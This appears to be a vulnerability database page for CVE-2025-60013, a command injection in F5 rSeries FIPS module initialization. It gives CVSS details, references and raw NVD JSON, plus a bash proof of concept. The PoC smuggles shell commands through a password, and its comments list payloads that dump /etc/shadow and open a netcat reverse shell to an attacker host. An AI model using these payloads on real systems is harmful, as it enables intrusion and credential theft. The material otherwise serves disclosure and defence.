CVE-2025-60013

Description

When a highly-privileged, authenticated attacker attempts to initialize the rSeries FIPS module using a password with special shell metacharacters, arbitrary system commands may be executed, and the FIPS hardware security module (HSM) may fail to initialize. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated.

CVSS Details

CVSS Score

4.6

Severity

MEDIUM

CVSS Vector

CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:o:f5:f5os-a:*:*:*:*:*:*:*:* - VULNERABLE

cpe:2.3:o:f5:f5os-a:1.8.0:*:*:*:*:*:*:* - VULNERABLE

F5 rSeries FIPS HSM（具体受影响版本请参考F5官方公告K000154661）

已到达技术支持终止（EoTS）的版本不在评估范围内

PoC / Exploit Code

⚠ For Security Research Only

The following code is for security research and authorized testing only.

python

#!/bin/bash
# CVE-2025-60013 - F5 rSeries FIPS Module Command Injection PoC
# This PoC demonstrates the shell metacharacter injection vulnerability
# in the F5 rSeries FIPS module initialization process.
#
# Prerequisites:
#   - Access to a high-privileged authenticated session on F5 rSeries
#   - Ability to invoke FIPS module initialization command
#
# WARNING: This is for educational and authorized testing purposes only.

# Step 1: Prepare a malicious password with shell metacharacters
# The password contains a semicolon followed by a command to execute
MALICIOUS_PASSWORD='InitPass; id > /tmp/pwned_fips.txt'

echo "[*] CVE-2025-60013 PoC - F5 rSeries FIPS Module Command Injection"
echo "[*] Preparing malicious payload..."

# Step 2: Attempt to initialize FIPS module with the malicious password
# The exact command may vary depending on F5 rSeries version and TMOS version
# Common initialization commands include:
#   - tmsh modify sys crypto fips init password <password>
#   - bigstart fips init --password <password>
#   - custom FIPS initialization scripts

echo "[*] Attempting FIPS module initialization with injected payload..."

# Simulated exploitation - replace with actual FIPS init command
# tmsh modify sys crypto fips init password "${MALICIOUS_PASSWORD}"

# Step 3: Verify command execution
echo "[*] Checking if injected command was executed..."
if [ -f /tmp/pwned_fips.txt ]; then
    echo "[+] SUCCESS: Command injection confirmed!"
    cat /tmp/pwned_fips.txt
    echo ""
    echo "[+] The attacker has achieved arbitrary command execution"
    echo "[+] and crossed the FIPS security boundary."
else
    echo "[-] Exploit may not have succeeded or target is not vulnerable."
fi

# Additional payload examples for further exploitation:
# MALICIOUS_PASSWORD='InitPass; cat /etc/shadow > /tmp/shadow_dump'
# MALICIOUS_PASSWORD='InitPass; nc -e /bin/sh attacker_ip 4444'
# MALICIOUS_PASSWORD='InitPass$(whoami)'

References

[1] CVE.org https://www.cve.org/CVERecord?id=CVE-2025-60013
[2] NVD NIST https://nvd.nist.gov/vuln/detail/CVE-2025-60013
[3] CVE Details https://www.cvedetails.com/cve/CVE-2025-60013/
[4] VulDB https://vuldb.com/cve/CVE-2025-60013
[5] https://my.f5.com/manage/s/article/K000154661

Raw JSON Data

JSON

{"cve": {"id": "CVE-2025-60013", "sourceIdentifier": "[email protected]", "published": "2025-10-15T14:15:55.993", "lastModified": "2026-02-04T20:16:03.633", "vulnStatus": "Modified", "cveTags": [], "descriptions": [{"lang": "en", "value": "When a highly-privileged, authenticated attacker attempts to initialize the rSeries FIPS module using a password with special shell metacharacters, arbitrary system commands may be executed, and the FIPS hardware security module (HSM) may fail to initialize. A successful exploit can allow the attacker to cross a security boundary. Note: Software versions which have reached End of Technical Support (EoTS) are not evaluated."}], "metrics": {"cvssMetricV40": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "4.0", "vectorString": "CVSS:4.0/AV:L/AC:L/AT:N/PR:H/UI:N/VC:L/VI:L/VA:N/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "attackRequirements": "NONE", "privilegesRequired": "HIGH", "userInteraction": "NONE", "vulnConfidentialityImpact": "LOW", "vulnIntegrityImpact": "LOW", "vulnAvailabilityImpact": "NONE", "subConfidentialityImpact": "NONE", "subIntegrityImpact": "NONE", "subAvailabilityImpact": "NONE", "exploitMaturity": "NOT_DEFINED", "confidentialityRequirement": "NOT_DEFINED", "integrityRequirement": "NOT_DEFINED", "availabilityRequirement": "NOT_DEFINED", "modifiedAttackVector": "NOT_DEFINED", "modifiedAttackComplexity": "NOT_DEFINED", "modifiedAttackRequirements": "NOT_DEFINED", "modifiedPrivilegesRequired": "NOT_DEFINED", "modifiedUserInteraction": "NOT_DEFINED", "modifiedVulnConfidentialityImpact": "NOT_DEFINED", "modifiedVulnIntegrityImpact": "NOT_DEFINED", "modifiedVulnAvailabilityImpact": "NOT_DEFINED", "modifiedSubConfidentialityImpact": "NOT_DEFINED", "modifiedSubIntegrityImpact": "NOT_DEFINED", "modifiedSubAvailabilityImpact": "NOT_DEFINED", "Safety": "NOT_DEFINED", "Automatable": "NOT_DEFINED", "Recovery": "NOT_DEFINED", "valueDensity": "NOT_DEFINED", "vulnerabilityResponseEffort": "NOT_DEFINED", "providerUrgency": "NOT_DEFINED"}}], "cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 2.7}, {"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:C/C:L/I:L/A:N", "baseScore": 4.6, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "HIGH", "userInteraction": "NONE", "scope": "CHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 1.5, "impactScore": 2.7}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-78"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:f5:f5os-a:*:*:*:*:*:*:*:*", "versionStartIncluding": "1.5.1", "versionEndExcluding": "1.5.4", "matchCriteriaId": "274F5948-3CDD-4E53-8D4F-AF728EE7CB0E"}, {"vulnerable": true, "criteria": "cpe:2.3:o:f5:f5os-a:1.8.0:*:*:*:*:*:*:*", "matchCriteriaId": "01B43BE0-F112-4580-A188-3FE0DD140D07"}]}]}], "references": [{"url": "https://my.f5.com/manage/s/article/K000154661", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}